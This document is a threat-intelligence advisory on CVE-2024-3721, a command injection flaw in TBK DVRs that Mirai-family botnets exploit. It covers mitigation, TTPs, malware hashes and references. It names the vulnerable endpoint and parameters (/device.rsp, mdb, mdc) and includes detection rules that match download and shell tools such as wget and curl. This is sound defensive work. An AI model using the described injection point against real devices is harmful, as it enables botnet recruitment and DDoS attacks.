CVE-2024-3721 TBK DVR Command Injection

Targeted Sectors

·         Critical infrastructure

·         maritime logistics

·         general consumers using unpatched IoT/DVR devices.

Targeted Countries

·         Global

·         High concentration on internet-exposed IoT devices.

BLUF

·         An existing public PoC for a command injection flaw in TBK DVR devices continues to be actively weaponized by Mirai botnets to recruit vulnerable IoT devices for DDoS campaigns.

Date of First Reported Activity (Exploitation/PoC)

·         April 2024 (PoC released).

Date of Last Reported Activity Update

·         December 8, 2025

·         ongoing botnet activity reported

APT Names

·         This does not appear to be state sponsored

Associated Criminal Organization Names

·         Associated with various general Mirai botnet operators

o   e.g., "Broadside" variant, "ShadowV2" botnet).

CVEs and CVSS Vectors:

CVE-2024-3721

Improper Neutralization of Special Elements used in an OS Command.

CVSS 3.1 Vector: CVSS:3.1

·         (6.3) /AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Tenable ID

·         There is no specific plugin for this CVE

Is this on the KEV List?

·         No

Mitigation and Guidance

Since an official patch from the manufacturer is unavailable, the primary guidance involves network segmentation and device management.

Isolate devices: Immediately isolate the affected TBK DVRs from untrusted networks.

·         Disable remote access

o   Disable remote access to the device if it is not strictly necessary.

·         Monitor activity

o   Monitor for any suspicious network activity or unauthorized command executions on the device.

·         Use third-party protection

o   Network security vendors such as Fortinet and Check Point have released intrusion prevention system (IPS) protections to detect and block exploitation attempts

IOCs

Connections to/from known C2 servers (e.g., specific IPs mentioned in various threat intel feeds).

File hashes of associated malware payloads (e.g., 87792cf4bd370f483a293a23c4247c50, specific ARM32 binaries).

TTPs

·         T1190 Exploit Public-Facing Application: Crafted POST requests to DVR web interfaces.

·         T1059.004 Command and Scripting Interpreter: Injecting shell commands into parameters (mdb, mdc).

·         T1105 Ingress Tool Transfer: Downloading ARM-based Mirai payloads.

Malware Names

·         Mirai

·         Broadside

·         ShadowV2

Malware Sample

As a reminder hashes tend to be dynamic and unique to each campaign. The heurisitic behavior is more notable.

Mirai

sha256

1fa305b5646b159d7af886c8bffb8da00076f9487991c2ceec382fd7c81cc208

URL to example

hxxps://bazaar.abuse.ch/sample/1fa305b5646b159d7af886c8bffb8da00076f9487991c2ceec382fd7c81cc208/

BroadSide

sha256

11c0447f524d0fcb3be2cd0fbd23eb2cc2045f374b70c9c029708a9f2f4a4114

URL to example

hxxps://www.virustotal.com/gui/file/11c0447f524d0fcb3be2cd0fbd23eb2cc2045f374b70c9c029708a9f2f4a4114

ShadowV

Sha256

db4b8c14162d4ec6e8ebbdfc0e024358cb5726c236953a875ff868154035de33

URL to sample

hxxps://www.virustotal.com/gui/file/db4b8c14162d4ec6e8ebbdfc0e024358cb5726c236953a875ff868154035de33

Delivery Method

Automated web scanning and exploitation of unpatched, internet-exposed DVR devices.

Email Samples: Not applicable; automated network exploitation

Suggested Rules / potential hunts

·         As a reminder these are indicator rules, they are likely to be noisy.

Suggested Suricata Rules

alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET INFO TBK DVR CVE-2024-3721 Command Injection Attempt"; flow:established,to_server; content:"POST"; http_method; content:"/device.rsp"; nocase; pcre:"/mdb=|mdc=/"; reference:url,bleepingcomputer.com; classtype:attempted-admin; sid:XXXXXXX; rev:1;)

Suggested Sentinel Rules

Syslog | where DeviceVendor contains "TBK" | where Message contains "device.rsp" and Message contains ("wget" or "curl" or "sh" or "system")

Potential Splunk Hunts

index=iot_logs uri_path="/device.rsp" | search "mdb=" OR "mdc=" | stats count by src_ip, uri_path, http_user_agent

References

Fortinet

·         hxxps://www.fortinet.com/blog/threat-research/rondobox-unveiled-breaking-down-a-botnet-threat

Securelist

·         hxxps://securelist.com/mirai-botnet-variant-targets-dvr-devices-with-cve-2024-3721/116742/

Cydome

·         hxxps://cydome.io/cydome-identifies-broadside-a-new-mirai-botnet-variant-targeting-maritime-iot/

FortiGuard Labs

·         hxxps://fortiguard.fortinet.com/outbreak-alert/tbk-dvrs-botnet-attack

Security Affairs

·         hxxps://securityaffairs.com/178779/malware/new-mirai-botnet-targets-tbk-dvrs-by-exploiting-cve-2024-3721.html

SOC Radar

·         hxxps://socradar.io/labs/app/cve-radar/CVE-2024-3721

NVD

·         hxxps://nvd.nist.gov/vuln/detail/CVE-2024-3721

TrendMicro

·         hxxps://www.trendmicro.com/en_us/research/25/j/rondodox.html

RedHat Customer Portal

·         hxxps://access.redhat.com/security/cve/cve-2024-3721

Malware Bazaar

·         hxxps://bazaar.abuse.ch/sample/1fa305b5646b159d7af886c8bffb8da00076f9487991c2ceec382fd7c81cc208/

VirusTotal

·         hxxps://www.virustotal.com/gui/file/11c0447f524d0fcb3be2cd0fbd23eb2cc2045f374b70c9c029708a9f2f4a4114

·         hxxps://www.virustotal.com/gui/file/db4b8c14162d4ec6e8ebbdfc0e024358cb5726c236953a875ff868154035de33